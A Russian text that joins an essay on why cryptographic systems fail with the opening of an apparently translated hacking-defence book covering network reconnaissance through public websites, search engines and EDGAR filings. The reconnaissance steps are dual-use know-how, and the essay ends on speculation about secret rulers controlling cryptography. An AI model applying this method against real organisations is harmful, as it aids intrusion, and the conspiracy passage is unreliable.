    В настоящее время криптография успешно используется почти во всех информационных системах — от Internet до баз данных. Без нее обеспечить требуемую степень конфиденциальности в современном, до предела компьютеризированном мире уже не представляется возможным. Кроме того, с помощью криптографии предотвращаются попытки мошенничества в системах электронной коммерции и обеспечивается законность финансовых сделок. Со временем значение криптографии, по всей вероятности, возрастет. Для этого предположения имеются веские основания.

    Однако с огорчением приходится признать, что подавляющее большинство криптографических систем не обеспечивает того высокого уровня зашиты, о котором с восторгом обычно говорится в их рекламе. Многие из них до сих пор не были взломаны по той простой причине, что пока не нашли широкого распространения. Как только эти системы начнут повсеместно применяться на практике, они, словно магнит, станут привлекать пристальное внимание злоумышленников, которых сегодня развелось великое множество. При этом удача и везение будут явно на стороне последних. Ведь для достижения своих целей им достаточно найти в защитных механизмах всего лишь одну брешь, а обороняющимся придется укреплять все без исключения уязвимые места.

    Реализация

    Понятно, что никто не в состоянии предоставить стопроцентную гарантию безопасности. Тем не менее, криптографическую защиту без особых усилий можно спроектировать так, чтобы она противостояла атакам злоумышленников вплоть до того момента, когда им станет проще добыть желаемую информацию другим путем (например, с помощью подкупа персонала или внедрения программ-шпионов). Ведь криптография действительно хороша именно тем, что для нее уже давно придуманы эффективные алгоритмы и протоколы, которые необходимы, чтобы надежно защитить компьютеры и компьютерные сети от электронного взлома и проявлений вандализма.

    Вот почему в реальной жизни криптографические системы редко взламываются чисто математическими методами. Ведь криптографический алгоритм или протокол от его практической реализации в виде работающей программы, как правило, отделяет зияющая пропасть. Даже доказанный по всем правилам формальной логики факт, что криптографическая зашита совершенна с математической точки зрения, совсем не означает, что она останется таковой после того, как над ее внедрением поработают программисты.

    Известно, что под давлением бюджетных ограничений, дефицита времени и личных неурядиц программисты неизбежно допускают весьма серьезные ошибки при реализации алгоритмов — используют плохие датчики случайных чисел для генерации криптографических ключей, не учитывают специфику аппаратной среды, в которой предстоит эксплуатировать созданные ими программные средства, а также регулярно забывают удалять ключевую и другую секретную информацию из оперативной памяти компьютера или с магнитного носителя после того, как надобность в ее хранении там отпала. Единственный способ научиться избегать этих и им подобных ошибок состоит в том. чтобы вновь и вновь стараться создать совершенные системы криптографической защиты данных, а потом не менее упорно пытаться их взломать.

    Конечно, после того как брешь в системе криптографической защиты найдена, ее довольно легко можно залатать. Но сам поиск подобного рода дефектов является невероятно сложной задачей. Никакое предварительное тестирование не поможет обнаружить в криптографической системе все дефекты, поскольку ни один тест в отдельности не может дать полной гарантии их отсутствия. Ведь если программа шифрования правильно зашифровывает и расшифровывает файлы, это еще совсем не значит, что она надежно защищает их содержимое.

    Учет реальных потребностей пользователей

    Немало проблем, связанных с использованием криптографических средств, создают сами пользователи. Безопасность заботит их меньше всего. В первую очередь им требуются простота, удобство и совместимость с уже существующими (как правило, недостаточно защищенными) программными продуктами. Они выбирают легко запоминающиеся криптографические ключи, записывают их где попало, запросто делятся ими с друзьями и знакомыми. Поэтому грамотно спроектированная криптографическая система обязательно должна принимать во внимание специфические особенности поведения людей.

    Еще труднее оказывается убедить людей в необходимости строго и неукоснительно применять криптографическую защиту данных. Пользователи с готовностью приносят в жертву собственную безопасность, если средства ее обеспечения мешают им поскорее сделать свою работу. Поэтому только в случае, если при проектировании криптографической системы были учтены реальные потребности пользователей, она действительно в состоянии защитить их компьютеры и компьютерные сети.

    Законодательные ограничения

    В Своде законов США имеется пункт 2778, который называется "Контроль за экспортом и импортом вооружений". Именно этот пункт является юридической основой для ряда инструкций, именуемых "Правилами контроля за перемещением оружия в мире" (International Traffic in Arms Regulations, сокращенно— 1TAR). Раздел 120.1 ITAR впрямую причисляет к военному снаряжению, за перемещением которого Соединенные Штаты осу шести, (я ют самый строгий контроль, программное обеспечение, предназначенное для целей эффективного шифрования данных. А это означает, что американским компаниям, желающим экспортировать программы эффективной) шифрования, необходимо зарегистрироваться в Государственном департаменте США в качестве торговца военным имуществом и получить там лицензию на экспорт.

    Известно, что при выдаче таких лицензий Госдепартамент целиком и полностью полагается на мнение АНБ. В результате лицензия на экспорт криптографических средств никому не выдается до тех пор, пока АНБ не одобрит такое решение. В свою очередь, АНБ отнюдь не заинтересовано в свободном распространении надежных программ шифрования за пределами страны. Поэтому все программные средства, произведенные в США и легально экспортируемые за рубеж, обеспечивают ослабленную криптографическую защиту.

    Чтобы повысить свою конкурентоспособность на мировом рынке, производители средств криптографической защиты в США вынуждены искать лазейки в законодательстве. Например, известная американская фирма RSA Data Security попыталась обойти закон путем финансирования усилии китайских ученых, которых правительство Китая официально уполномочило разработать новые программные средства шифрования данных. Предполагалось, что эти средства, созданные на основе алгоритмов, переданных американской фирмой китайцам, смогут обеспечить более надежную криптографическую защиту информации, чем те, которые Китай в состоянии импортировать из США в соответствии с действующим американским законодательством. Это, несомненно, радостное событие для Китая, однако следует отметить, что ради удовлетворения потребностей рядового пользователя за рубежом, не обладающего возможностями и ресурсами, сравнимыми с теми, которые имеются в распоряжении китайского правительства, американские производители программ эффективного шифрования вряд ли будут искать какие-либо пути, ведущие в обход американского законодательства.

    Следуя примеру США, ряд государств, в том числе и Россия, ввели ограничения на экспорт, импорт и использование шифровальных средств. Тем не менее, многих российских граждан ничуть не пугают законодательные ограничения на эксплуатацию шифровальных средств. Они твердо придерживаются мнения о том, что принадлежащая им информация безусловно являемся объектом их собственности, и что они, как собственники своей информации, имеют право самостоятельно определять правила ее хранения и защиты. Остается только со знанием дела решить, какие именно шифровальные средства применять для адекватной защиты этой информации, а какие не использовать ни в коем случае, ввиду их слабой надежности.

    Слишком малая длина ключа

    Слишком малая длина ключа — одна из самых очевидных причин ненадежности криптографических систем. Причем недостаточную длину ключа могут иметь даже те криптосистемы, в которых применяются самые надежные алгоритмы шифрования, поскольку:

    • в них изначально может присутствовать возможность работы с ключом переменной длины для того, чтобы при использовании этих систем на практике можно было выбрать нужную длину ключа, исходя из желаемой надежности и эффективности;
    • они разрабатывались тогда, когда данная длина используемого ключа считалась более чем достаточной для обеспечения необходимого уровня криптографической защиты;
    • на них распространяются экспортные ограничения, которые устанавливают допустимую длину ключа на уровне, не отвечающем современным требованиям.

    Первым надежным криптографическим алгоритмом, который вплотную столкнулся с проблемой выбора адекватной длины ключа, стал RSA. Дело в том, что его вскрытие требует разложения на множители (факторизации) очень больших чисел. В марте 1994 г. за вполне приемлемое время было факторизовано 428-битовое число, а на сегодняшний день достаточно реальным представляется факторизация 512-битовых чисел. Достигнутый прогресс в решении задачи факторизации очень больших чисел связан не только с ростом вычислительных мощностей современного компьютерного парка, но и с разработкой новых эффективных алгоритмов. На том, что эта задача является очень трудоемкой, еще совсем недавно была основана надежность криптографического алгоритма, используемого в распространенной программе PGP. Поэтому можно утверждать, что сегодня разложение на множители является одной из самых динамично развивающихся областей криптографии.

    В начале 1998 г. из-за слишком малой длины ключа (56 бит) фактически "приказал долго жить" DES-алгоритм, долгое время являвшийся официальным стандартом шифрования данных в США. Сейчас американским Национальным институтом стандартов объявлен конкурс на новый стандарт шифрования данных Advanced Encryption Standard (AES). Согласно условиям этого конкурса, кандидаты на роль AES должны представлять собой симметричные алгоритмы шифрования с ключом длиной более 128 бит.

    Потайные ходы

    Причины появления потайных ходов в криптографических системах довольно очевидны: их разработчики хотят иметь контроль над шифруемой в этих системах информацией и оставляют для себя возможность расшифровывать ее, не зная ключа пользователя. Средство, с помощью которых данная возможность реализуется на практике, и принято именовать потайным ходом. Иногда потайные ходы применяются для целей отладки, а после ее завершения разработчики в спешке просто забывают убрать их из конечного продукта.

    Классический пример потайного хода, который хакерами единодушно признается самым талантливым "хаком" по взлому системы парольной зашиты всех времен и народов, привел Кен Томпсон (один из авторов компилятора для языка программирования С) в своей лекции по случаю вручения ему престижной премии Тьюринга. Дело в том, что в операционной системе UNIX пользовательские пароли хранятся в зашифрованном виде в специальной базе данных. В компилятор языка С Томпсоном был предусмотрительно вставлен код, распознававший, когда на вход компилятора поступала программа, содержавшая приглашение пользователю зарегистрироваться (login). Тогда компилятор добавлял в эту программу код, который распознавал пароль, выбранный самим Томпсоном. Таким образом, Томпсон получал возможность успешно проходить процедуру регистрации и идентификации, не зная легальных паролей, хранимых в зашифрованной базе данных.

    Стандартный способ закрыть такой потайной ход состоит в том, чтобы удалить из исходного текста компилятора "вредный" код, а затем его перекомпилировать. Но при перекомпиляции опять не обойтись без компилятора. И Томпсон дописал свой компилятор так, чтобы тот распознавал, когда на его вход поступала исправленная версия его самого. В этом случае компилятор добавлял в нее код, который, в свою очередь, при компиляции программ с приглашением login дописывал в них код, дающий Томпсону привилегированный доступ, а также код, который позволял компилятору распознавать свою обновленную версию при перекомпиляции. Таким образом, не имеет значения, насколько надежным был криптографический алгоритм, который использовался для шифрования паролей пользователей операционной системы UNIX. Потайной ход, придуманный Томпсоном. оставался открыт для него при любых условиях.

    Шифрование вокруг нас

    Итак, для того чтобы создать надежную криптографическую систему, необходимо обладать достаточными познаниями в области современной криптографии, аккуратно и безошибочно воплотить эти познания в виде работающей программы с дружественным интерфейсом, убрав из нее все потайные ходы по окончании отладки. Далее требуется передать эту систем) в ФАПСИ, чтобы получить там лицензию, дающую право на ее легальное распространение и использование на территории России. Однако несмотря на богатый научный потенциал российских криптографов и высокую квалификацию отечественных программистов, единственным лицензированным ФАПСИ шифром в настоящее время является ГОСТ 28147-89, разработанный еще в недрах КГБ. Все остальные криптосистемы, предлагаемые зарубежными и российскими фирмами в виде законченных продуктов или библиотек, включая как устоявшие зарубежные стандарты, так и самостоятельные оригинальные разработки, являются незаконными.

    Поскольку наше государство оказывается не в состоянии обеспечить всех своих граждан, остро нуждающихся в надежной информационной защите, сертифицированными криптографическими средствами, виртуальная среда обитания российского компьютерного пользователя буквально нашпигована шифровальными программами (сотни таких программ можно найти в Internet, например, по адресу ftp.elf.stuba.sk/pub/security). Их распространению способствует нечеткость президентского Указа № 334, в котором не оговорено, что же конкретно понимается под термином "шифрование" данных. Если предположить, что шифрование — это такая нестандартная кодировка данных, которая серьезно затрудняет возможность их перекодировки в стандартное представление без соответствующего аппаратного или программного обеспечения, то в категорию шифрсистем тут же попадут архиваторы (pkzip, arj и r а r ), известные текстовые редакторы (Word и Lexicon), a также средства редактирования графических изображений (Paint и CorelDraw), поскольку все они используют свою собственную нестандартную кодировку, не позволяющую без соответствующих программ просматривать закодированные с их помощью данные.

    Попытка придумать универсальный критерий подразделения кодировок на стандартные и нестандартные заранее обречена на провал, т. к. разработчиков программного обеспечения нельзя заставить пользоваться только кодировкой, одобренной указом президента в качестве стандартной. Поэтому лучше к системам шифрования относить, например, программные средства, к которым прилагается документация с явным указанием того факта, что они предназначены именно для шифрования данных.

    Учитывая неразбериху, царящую в российском законодательстве, неудивительно, что российские пользователи для защиты своей конфиденциально!! информации активно применяют архиваторы с парольной защитой, Norton Diskreet, Word, Excel, многочисленные условно-бесплатные программы (PGP, CodeDvag, SecurPC, Secur-all 32, BestCrypt NP, Kremlin и др.). криптографические системы отечественных фирм ("Лан Крипто". "Анкорт" и др.), собственные кустарные разработки, а также программы неизвестного происхождения. Большинство из них крайне слабы, и программы их взлома за вполне умеренную плату можно получить, например, в Internet по адресу www.accessdata.com. Исключение в списке заведомо ненадежных криптографических систем, потенциально доступных пользователю в России, составляют лишь несколько оригинальных разработок российских фирм. Однако ввиду воздвигнутой нашим государством информационной блокады вокруг криптографии и всего, что с ней связано, можно только строить предположения, какие именно.

    Подводя итог сказанному, можно сделать вывод о том, что ситуация па рынке криптографических систем не внушает оптимизма. Законодательные ограничения, ошибки в реализации, недружественный интерфейс, недостаточная длина ключа и наличие потайных ходов приводят к тому, что отыскать надежную криптосистему практически невозможно.

    Поскольку криптография призвана обслуживать потребности человечества в довольно деликатной сфере (с помощью криптографических методов сохраняется в тайне конфиденциальная информация, не подлежащая, по мнению ее владельцев, бесконтрольному распространению), некоторые исследователи усматривают в сложившейся ситуации действие определенных тайных сил, которые пытаются направлять и контролировать прогресс человечества в области криптографии. Одна из главных забот этих тайных сил — взять каждого "под колпак", т. е. иметь наиболее полное досье на любого человека. Поэтому тайные общества так заинтересованы в единоличном владении элитарными криптографическими знаниями и созданными на основе этих знаний надежными средствами криптографической защиты данных, бесконтрольное распространение которых может поставить под угрозу их способность ведения тотальной слежки. Безрезультатно заканчиваются многообещающие криптографические исследования, при загадочных обстоятельствах обрываются жизни талантливых криптографов, возникают всевозможные препоны на пути свободного обмена информацией о последних криптографических изысканиях.

    Другие исследователи закулисных пружин истории идут еще дальше и утверждают, что именно наиболее полные и достоверные знания из области криптологии (науки, объединяющей криптографию и криптоанализ), позволили нынешним тайным властителям, распоряжающимся судьбой человечества, достичь вершин своего могущества. Гипотеза этих исследователей состоит в том, что криптология является одним из эффективных инструментов познания окружающего мира: информация о главных направлениях его развития в зашифрованном виде доступна каждому и ее можно извлечь путем дешифрования. Кто знает, как это делается, обладает почти неограниченной властью над миром, поскольку может с большой достоверностью предсказывать будущее.

    Объединены ли тайные верховные правители в единую организацию? Врядли. Скорее всего, между их различными сообществами существует серьезная конкуренция. Да и могущество их простирается до определенных пределов.

    Поэтому время от времени вполне вероятно появление надежных криптосистем, хотя бы на ограниченный период времени.

    Проверить эти гипотезы на практике представляется невозможным, и некоторым они могут показаться слишком смелыми, но иметь о них представление совершенно необходимо. Хотя бы для того, чтобы в случае приобретения вами заведомо ненадежной криптосистемы для нужд вашей фирмы или организации оправдать свою оплошность перед руководством вмешательством неких тайных всемогущих сил.

     

    10. Обеспечение безопасности в сети Интернет

    Самоучитель по защите в Интернет

    Введение





    Введение


    Когда в лесу падает дерево и никого нет поблизости, в любом случае раздается громкий треск. Однако если компьютерная сеть содержит изъян в системе защиты и никому об этом неизвестно, то на первый взгляд кажется, что такую сеть можно считать надежной. Лишь самый большой идеалист может поспорить с этим утверждением, однако очень скоро вы увидите, что все далеко не так очевидно.
    Сеть с изъяном в подсистеме зашиты оказывается незащищенной для тех, кому известно об этой бреши. Если о ней не знает никто, т.е. изъян до настоящего момента еще не был обнаружен, то можно считать, что сеть в безопасности. Если хотя бы один человек узнает об этом слабом месте, то сеть станет для него уязвимой, однако она по-прежнему будет защищенной от всех остальных. Если же о недостатке станет известно производителю оборудования... Если специалисты какой-либо исследовательской группы узнают об этом... Если эта информация попадет в руки сообщества хакеров... В любой из этих ситуаций незащищенность сети возрастет во много раз и эта новость мгновенно станет всеобщим достоянием.
    Так ли это на самом деле? Изъян существует независимо от того, известно о нем кому-либо или нет. Опубликование материалов на этот счет напрямую не приводит к незащищенности сети. Подобное утверждение может сбить с толку. Публикация материалов повышает вероятность того, что взломщик воспользуется этим слабым местом, однако это никак не характеризует сам изъян. В то же время информационные сообщения увеличивают и вероятность того, что будут предприняты соответствующие контрмеры. Точно так же, как злоумышленник не сможет воспользоваться неизвестным изъяном, так и защитить сеть нельзя будет до тех пор, пока о ее слабом месте не станет известно.
    Так что сохранение информации об обнаруженном изъяне в секрете является далеко не лучшим способом борьбы с ним. Такой подход оказывается полезным лишь до того момента, пока этот секрет таковым и будет оставаться. Однако все, что связано с информацией, приводит к ее распространению. Одни разглашают секреты случайно. Другие — с определенными целями. Иногда секреты попадают в руки третьих лиц. Однако как только эта информация перестала быть секретной, ее уже никогда не удастся спрятать.
    Процесс обеспечения безопасности, при котором полученные данные без ограничения предоставляются широкой общественности, оказывается наиболее робастным. Конечно, взломщики тоже узнают об этом, однако они смогут получить требуемую информацию и в любом другом случае. Что более существенно, важные данные станут доступны и специалистам, разрабатывающим системы защиты, производителям программного и аппаратного обеспечения, которые смогут устранить обнаруженные изъяны и выпустить соответствующие модули обновления, и системным администраторам, которые смогут принять требуемые контрмеры. Чем больше людей знают об изъяне, тем больше повышается вероятность его устранения. Настроив себя на предоставление информации, а не на ее сокрытие, вы способствуете повышению уровня защищенности, а не его понижению.
    Приведенные размышления лежат в основе сложной проблемы обеспечения безопасности со всеми связанными с ней аспектами, что в результате приводит к улучшению защищенности сети Internet на протяжении многих лет. После публикации результатов исследований и демонстрационного кода производители программного обеспечения уделяют больше времени устранению известных изъянов. Различные компании не в состоянии устранить проблемы, упоминание о которых появляется в газетах. Internet по-прежнему остается практически незащищенной, однако будет гораздо хуже, если все из существующих изъянов безопасности останутся скрытыми от общественности.
    Из-за того что общедоступная информация автоматически не попадает в руки большинства людей, и появилась эта книга. "Секреты"хакеров — это очень подробная информация о способах обеспечения компьютерной безопасности. В этом издании содержится полное описание изъянов в системах зашиты: что они собой представляют, как их можно использовать и какие ответные контрмеры следует предпринимать. После чтения этой книги вы будете знать о своей сети гораздо больше и, что еще более важно, сможете защитить ее гораздо лучше, чем с помощью сведений, содержащихся в любом другом аналогичном издании. Эта книга содержит по-настоящему бесценную информацию.
    Конечно, полученные знания можно использовать как для защиты, так и для нападения. Кто-нибудь может воспользоваться этими сведениями как руководством для реализации собственных атак. Почти наверняка именно это и случится, что достаточно грустно. Однако на самом деле все обстоит несколько иначе. Прежде уже появлялись руководства по нападениям на компьютерные системы и сети. Их можно найти на различных Web-узлах и в интерактивных службах. Они гораздо раньше были предназначены для хакинга, хотя и не были описаны столь подробно, как в этой книге. Здесь содержатся сведения для тех, кому необходимо знать о том, какие действия предпринимаются хакерами, как функционируют используемые при этом средства и какие изъяны скрыты в системе защиты эксплуатируемых сетей.
    Первое издание этой книги стало настоящим бестселлером среди книг на компьютерную тематику: более 70 тысяч экземпляров было продано менее чем за один год. Тот факт, что авторам пришлось так быстро обновить содержимое книги, говорит о том, что появилось настолько много новой информации, что понадобилось выпустить второе издание.
    Вот библейское высказывание, которое можно высечь на камне: "Стремитесь к истине, и она сделает вас свободными". Знания — это большая сила, поскольку они позволяют принимать взвешенные решения, основанные на законах реальности, ...а не на том, как это выглядит в ваших собственных глазах. Эта книга предоставит новые знания и во много раз приумножит вашу силу. Воспользуйтесь ими в полной мере.


    Глава 1. Предварительный сбор данных



    Глава 1. ПРЕДВАРИТЕЛЬНЫЙ СБОР ДАННЫХ




    1. Предварительный сбор данных



    Предварительный сбор данных


    Прежде чем приступить к столь увлекательному занятию, как хакинг, необходимо выполнить рад подготовительных мероприятий. В этой главе рассматривается первый этап подготовки, заключающийся в предварительном сборе данных (footpnntmg) о представляющей интерес сети. Именно так и поступают настоящие преступники, решившие ограбить банк. Они не вваливаются в операционный зал и не начинают требовать денег (за исключением разве что самых примитивных грабителей). Любая по-настоящему опасная группировка, замышляющая ограбление посвятит немало времени сбору информации об этом банке. Они изучат маршруты передвижения бронеавтомобилей, время доставки наличных денег, места расположения видеокамер и служебных выходов, а также все, что может им пригодиться для реализации их преступных замыслов. 
    То же самое необходимо проделать и взломщику компьютерной сети, если он хочет добиться успеха. Для того чтобы нанести точный и своевременный удар и при этом не быть пойманным, он должен собрать как можно больше информации. Поэтому взломщики обычно пытаются разведать все, что только может иметь хоть какое-то отношение к системе обеспечения безопасности организации. После завершения этого процесса в руках хакера может оказаться целое "досье", или профиль, в котором содержится описание способов подключения организации к Internet, возможностей удаленного доступа к ее сети, а также конфигурации внутренней сети. Следуя хорошо структурированной методологии, из самых разных источников хакер по крупинкам может собрать досье практически на любую организацию.


    2. Что такое предварительный сбор данных



    Что такое предварительный сбор данных


    В результате систематизированного сбора информации хакеры могут получить в свое распоряжение полный профиль системы защиты организации. Начав "с нуля" (например, имея лишь общие сведения о подключении к Internet) и применяя различные средства и технические приемы, взломщик может получить в конце концов совершенно определенный набор доменных имен, адресов подсетей и отдельных компьютеров этой организации, подключенных к Internet. Методов сбора подобной информации очень много, однако все они сводятся к одному - получению информации, имеющей отношение к технологиям Internet, корпоративным сетям (intranet), удаленному доступу (remote access) и экстрасетям (extranet). Все эти технологии, а также важные данные которые взломщики пытаются получить, перечислены в Табл. 1.1.


    3. Для чего необходим предварительный сбор данных



    Для чего необходим предварительный сбор данных


    Предварительный сбор данных необходим для того, чтобы систематически и методологически гарантировать получение всей информации, имеющей отношение ко всем из вышеперечисленных технологий, используемых в конкретной организации. Без четко определенной методики выполнения этой работы высока вероятность того, что какая-нибудь часть важной информации не будет получена. Предварительный cбор данных о системе безопасности организации зачастую оказывается одной из наиболее трудных задач, однако в то же время этот процесс является наиболее важным. Его успешное завершение можно обеспечить лишь при четком следовании определенной методике и его контроле.


    4. Сбор данных о подключении к Internet



    Сбор данных о подключении к Internet


    Для сбора данных о различных технологиях применяются схожие методы (это справедливо, например, по отношению к Internet и корпоративным сетям), поэтому в этой главе подробно рассматриваются лишь методы сбора необходимой информации о подключении организации к Internet. Вопросы сбора данных об удаленном доступе будут подробно рассмотрены в главе 9, "Хакинг удаленных соединений, РВХ, Voice-mail и виртуальных частных сетей".

    Таблица 1.1. Важная информация, которую могут определить взломщики об используемых технологиях

    Технология Идентифицирующие сведения
    Internet
    Имена доменов;. адреса подсетей; точные IP-адреса компьютеров, подключенных к Internet; TCP- и UDP-службы; работающие на каждом из обнаруженных компьютеров; архитектура системы (например, SPARC X86); механизмы управления доступом и соответствующие списки управления доступом (ACL — Access Control List); системы выявления вторжений (IDS); регистрационная информация (имена пользователей и групп, системные маркеры, таблицы маршрутизации, информация о протоколе SNMP)
    интрасети
    Используемые сетевые протоколы (например, IP, IPX, DecNET и т.д.); имена внутренних доменов; адреса подсетей; точные IP-адреса компьютеров, подключенных к Internet; TCP- и UDP-службы; работающие на каждом из обнаруженных компьютеров; архитектура системы (например, SPARC X86); механизмы управления доступом и соответствующие списки управления доступом (ACL — Access Control List); системы выявления вторжений (IDS); регистрационная информация (имена пользователей и групп, системные маркеры, таблицы маршрутизации, информация о протоколе SNMP)
    удаленный доступ
    Телефонные номера, используемые для удаленного доступа, а также тип АТС (аналоговая или цифровая); тип удаленной операционной системы; механизм аутентификации
    экстрасети
    Исходящая и входящая точки соединения; тип соединения; механизм управления доступом

    Строго говоря, сложно дать четкие рекомендации по выполнению процесса сбора информации, поскольку осуществить это можно по-разному. Тем не менее, в данной главе предпринята попытка описать основные этапы, которые обязательно должны быть проведены при анализе информации для создания профиля организации. Многие из описанных приемов можно с успехом применять и для сбора данных о других технологиях, упоминавшихся выше.


    5. Этап 1. Определение видов деятельности



    Этап 1. Определение видов деятельности


    Прежде всего необходимо определить виды деятельности, которые будут осуществляться при сборе информации. Например, нужно ответить на вопрос, планируете ли вы собрать данные обо всей сети организации или же ограничитесь лишь определенными ее сегментами (например, сетью главного офиса)? В некоторых случаях собрать данные обо всей организации может оказаться затруднительным. К счастью, в Internet можно найти множество ресурсов, с помощью которых можно сузить область деятельности, а также получить открытую информацию об организации и ее служащих.

    Поиск по открытым источникам



    Прежде всего начните с Web-страницы организации (если, конечно, она существует). Зачастую оказывается, что на таких Web-страницах присутствует информация, которая может помочь взломщику. Однажды нам даже довелось увидеть на одном Web-узле конфигурационные параметры, которые использовались для настройки системы защиты этой организации с помощью брандмауэра. К другим данным, которые можно получить и которые могут представлять интерес, относятся следующие.

    •  Адреса и места расположения офисов и подразделений.
    •  Деловые партнеры и поставщики.
    •  Новости о слиянии или приобретении.
    •  Номера телефонов.
    •  Контактная информация и адреса электронной почты.
    •  Требования к сотрудникам и посетителям по обеспечению безопасности, по которым можно судить об применяемых механизмах защиты. 
    •  Ссылки на другие Web-узлы, имеющие отношение к организации.

    Кроме того, попробуйте просмотреть комментарии, содержащиеся в HTML-коде Web-страниц. Зачастую в коде HTML можно найти интересные, с точки зрения взломщика, комментарии, такие как "<", "!" и "--", которые не отображаются на экране при открытии страницы в окне броузера. Просмотр исходного кода Web-страницы в автономном режиме позволит гораздо эффективнее работать в интерактивном режиме. Так что зачастую полезно сохранить полный образ всего Web-узла для дальнейшего просмотра. Впоследствии эту локальную копию можно использовать для поиска комментариев или других важных данных программным способом и, таким образом, значительно повысить эффективность процесса сбора информации. Для создания образа всего Web-узла в системе UNIX можно воспользоваться утилитой Wget (ftp://gnjilux.cc.fer.hr/pub/unix/util/wget/), а в системе Windows — утилитой Teleport Pro (http://www.tenmax.com/teleport/home.htm).
    После изучения Web-страниц можно поискать данные об организации в открытых источниках. Опубликованные статьи, сообщения для печати и так далее могут дать представление о происходящих в организации событиях и принятой в ней политике безопасности. На таких Web-узлах, как finance.yahoo.com или www.companysleuth.com, содержится огромное количество подобной информации. Если вы собираете данные о компании, значительная часть деятельности которой выполняется через Internet, то достаточно покопаться как следует в прессе, чтобы выяснить, что у такой компании нередко возникают проблемы, связанные с нарушением безопасности. Для того чтобы найти такой материал, вполне достаточно поискового сервера. Однако для этих целей можно использовать и более мощные средства и критерии поиска, позволяющие получить дополнительную информацию.
    Одним из наших любимых средств такого класса является комплект поисковых средств FerretPRO компании FerretSoft (http://www.ferretsoft.com). Средство поиска в Web WebFerretPRO позволяет выполнять поиск сразу на нескольких поисковых серверах. Кроме того, другие средства этого комплекта позволяют выполнять поиск по заданному критерию в каналах IRC, системе USENET, сообщениях электронной почты, а также в базах данных. Если вам нужно бесплатное средство, позволяющее выполнять поиск одновременно по нескольким критериям, обратитесь по адресу http: //www.dogpile.com.
    Поиск в системе USENET сообщений, отправленных из интересующего вас домена (вида @targetdomain.com), очень часто позволяет получить полезную информацию. Однажды в одной из групп новостей мы наткнулись на сообщение от системного администратора, в котором он жаловался на проблемы, возникшие у него после установки новой офисной АТС. Для передачи этого сообщения он воспользовался своей рабочей учетной записью. Он просил помощи, так как не знал, как отключить установленный по умолчанию режим доступа по паролю. Трудно даже предположить, сколько фрикеров (phreak — использование знаний об устройстве АТС для осуществления звонков за чужой счет) воспользовалось "услугами" этой организации. Поэтому естественно, что, изучая сообщения, отправляемые служащими организации, можно значительно повысить свою осведомленность в ее внутреннем устройстве и уровне технической подготовки ее сотрудников.



    Рис. 1.1. С помощью директивы link: tar getdomain.com механизма поиска AltaVista можно получить список всех узлов, которые содержат ссылки на заданный домен

    Наконец, можно просто воспользоваться средствами расширенного поиска некоторых ведущих поисковых серверов, таких как AltaVista или Hotbot. Многие из них позволяют найти все Web-страницы, на которых имеются ссылки на домен интересующей вас организации. На первых взгляд эта возможность не представляет собой ничего интересного, но не торопитесь с выводами! Допустим, кто-то из сотрудников организации решил создать собственный Web-узел дома или во внутренней сети организации. Весьма вероятно, что такой Web-узел будет иметь недостаточный уровень защиты или, более того, он может быть создан без ведома руководства. Как показано на рис. 1.1, обнаружить такой Web-узел можно именно с помощью описанного метода.
    Как видно из рис. 1.1, в результате поиска получен список узлов, на Web-страницах которых обнаружены ссылки на домен www.10pht.com, а также слово "hacking". С такой же легкостью можно получить список узлов, содержащих ссылки на любой другой требуемый домен.
    Другой пример (рис. 1.2) демонстрирует, как ограничиться поиском на определенном узле. В рассматриваемом примере показаны результаты поиска на узле http://www.l0pht.com страниц, содержащих слово mudge. Подобный запрос можно использовать и для поиска любой другой информации.
    Очевидно, что приведенные примеры не исчерпывают всех возможностей, предоставляемых средствами поиска, так что проявляйте изобретательность. Иногда очень важную информацию можно найти лишь после применения весьма необычных критериев.

    Поиск в базе данных EDGAR



    Для поиска информации о компании, представляющей собой открытое акционерное общество (publicly traded company), можно воспользоваться базой данных EDGAR, поддерживаемой Комиссией по безопасности и обмену данными (SEC — Securities and Exchange Commission), находящейся по адресу http: //www. sec. gov (рис. 1.3).



    Рис. 1.2. С помощью директивы host: targetdomain.com механизма поиска AltaVista можно получить список страниц узла targetdomain, содержащих, заданную строку (в данном случае mudge)



    Рис. 1.3. База данных EDGAR позволяет получить открытые документы, которые могут содержать важную информацию о структуре организации

    Одной из самых больших проблем, с которыми сталкиваются крупные компании, — это управление соединениями с Internet, особенно если они вовлечены в активную деятельность по приобретению других компаний или сами являются объектами приобретения. Именно поэтому так важно обращать внимание на информацию о недавно приобретенных компаниях. Среди документов комиссии SEC можно отметить два особенно важных: 10-Q и 10-К. Документ 10-Q представляет собой краткую сводку о деятельности организации за последний квартал. Кроме всей остальной информации в этом отчете также указывается количество акций компаний, приобретенных организацией за отчетный период, или количество акций организации, приобретенных за этот же период другими компаниями. Отчет 10-К содержит аналогичную информацию, однако он обновляется один раз в год. Поэтому сведения, приведенные в нем, могут потерять актуальность. Можно, например, поискать в этих документах слова subsidiary (дочерняя) или subsequent events (последующие события). В результате вы можете получить представление о недавно приобретенных компаниях или планирующихся слияниях. Зачастую организации подключают сети приобретенных ими компаний, забывая о требованиях безопасности. Поэтому вероятность того, что вы сможете проникнуть в сеть родительской компании, прорвав защиту новоприобретенного подразделения, довольно высока. Это лишний раз доказывает, что взломщики являются приверженцами хаоса и анархии, поскольку они всегда не преминут воспользоваться неразберихой, царящей в организации во время объединении сетей.
    Осуществляя поиск в базе данных EDGAR, не забывайте о том, что в качестве критериев нужно использовать названия компаний и организаций, отличающихся от названия родительской компании. Это окажется особенно важным при выполнении последующих этапов, когда вы будете обращаться с организационными запросами whois к различным базам данных (см. раздел "Этап 2. Инвентаризация Сети").

    Контрмеры: обеспечение безопасности общедоступных баз данных



    Большая часть приведенных выше сведений должна быть общедоступной. Особенно это касается открытых акционерных обществ. Однако в то же время очень важно оценить и классифицировать типы такой информации. Для выполнения такого анализа может оказаться полезным руководство по обеспечению безопасности узла (Site Security Handbook, документ RFC2196). Его можно найти по адресу http://ietf.org/rfc/rfc2196.txt. И наконец, если на Web-страницах вашего узла имеется хоть какая-нибудь информация, которая может помочь взломщику в проникновении в вашу сеть, удалите ее, если только это не является жизненно необходимым.


    1.gif

    Изображение: 

    2.gif

    Изображение: 

    3.gif

    Изображение: 

    6. Этап 2. Инвентаризация сети



    Этап 2. Инвентаризация сети


    Первым шагом в процессе инвентаризации сети (network enumeration) является идентификация имен доменов и сетей, связанных с конкретной организацией. Доменные имена представляют собой адрес компании в Internet и являются Internet-эквивалентами названия компании, например AAAApainting.com или moetavern.com.
